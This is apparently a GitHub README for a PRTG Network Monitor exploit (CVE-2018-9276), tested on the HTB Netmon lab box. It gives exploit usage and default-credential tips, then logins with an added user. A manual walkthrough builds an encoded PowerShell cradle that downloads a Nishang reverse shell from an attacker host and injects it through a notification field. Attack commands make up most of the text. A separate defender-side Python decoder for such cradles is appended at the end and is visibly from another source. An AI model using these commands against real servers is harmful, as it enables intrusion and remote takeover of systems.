A1vinSmith/CVE-2018-9276

CVE-2018-9276 Authenticated Command Injection

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

Dependencies

  • Impacket (python3 version)
  • Netcat
  • Msfvenom

Usage

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass

  1. Credentials are required to perform the exploit. Try the default credentials prtgadmin:prtgadmin. CVE-2018-19410 can also be used to set up an account without authentication. It may also be worth checking the PRTG database or logs for credentials: https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Try --lport 445 if that port is not already in use.
  3. There are a few convoluted comments in the code; they may need some modification.
  4. It may take a few attempts to succeed. Rebooting the target machine is always a good option, especially when your payload has caused some impact.

Test coverage

HTB Netmon box

OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Credit

A big thank you to wildkindcc for the Python 2 version: https://github.com/wildkindcc/CVE-2018-9276

Expand Knowledge

CVE-2018-19410, another route to obtaining credentials

https://medium.com/@qdoan95/building-an-exploit-for-cve-2018-19410-1475f555f74c

Using Metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Remote Code Execution

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Usage sample

Credentials are required to perform the exploit. First log in and obtain the authenticated session cookie, which is then used to add a new user.

./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Log in as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or, alternatively, with psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10


Advanced: manual exploitation without adding a new user

Credit belongs to the official HTB writeup.

In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However, due to HTML encoding, many characters get encoded. We can bypass this using PowerShell base64 execution. We need to create a base64-encoded command. However, it should be in the encoding which Windows uses, i.e. UTF-16LE.

❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

We use iconv to convert it to the target encoding, and will execute this reverse shell from Nishang: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Download the script and echo the invocation onto its last line.

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

Now start a simple HTTP server and create a new notification.

python3 -m http.server 80

Click on Setup > Account Settings > Notifications, then click “Add new notification” on the far right. Trigger the notification by clicking the Bell button.

abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 
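As an added defender-side example (not code from this repository or from the HTB writeup), the following Python decodes a `-enc` argument the way PowerShell does, base64 over UTF-16LE rather than UTF-8, and flags download cradles such as the one above when found in a process command line or a PRTG notification parameter. The sample lines, including the 10.10.10.100 URL taken from the writeup, are constructed test input.

```python
import base64
import binascii
import re
from typing import Optional

# powershell[.exe] ... -e / -ec / -en... / -enc / -encodedcommand <base64 blob>
# (PowerShell accepts any unambiguous prefix of -EncodedCommand).
ENC_RE = re.compile(
    r"powershell(?:\.exe)?\b.*?-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I
)

# Fragments typical of download-and-execute cradles such as the Nishang one above.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient")


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument: base64 over UTF-16LE, not UTF-8."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def analyse(line: str) -> Optional[dict]:
    """Return None for lines without an encoded command, else a finding dict."""
    m = ENC_RE.search(line)
    if m is None:
        return None
    try:
        decoded = decode_encoded_command(m.group(1))
    except (binascii.Error, UnicodeDecodeError):
        # A blob that is not valid base64 / UTF-16LE is itself worth a look.
        return {"decoded": None, "suspicious": True, "reasons": ["undecodable blob"]}
    reasons = [k for k in CRADLE_MARKERS if k in decoded.lower()]
    return {"decoded": decoded, "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample input: the notification parameter from the writeup above,
# a benign encoded command, and an unrelated program call.
_cradle = ("IEX(new-object net.webclient).downloadstring"
           "('http://10.10.10.100/Invoke-PowerShellTcp.ps1')")
SAMPLE_LINES = [
    "abc.txt | powershell -enc " + base64.b64encode(_cradle.encode("utf-16-le")).decode(),
    "powershell -enc " + base64.b64encode("Get-Date".encode("utf-16-le")).decode(),
    "abc.txt | notepad.exe",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(analyse(line))
```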

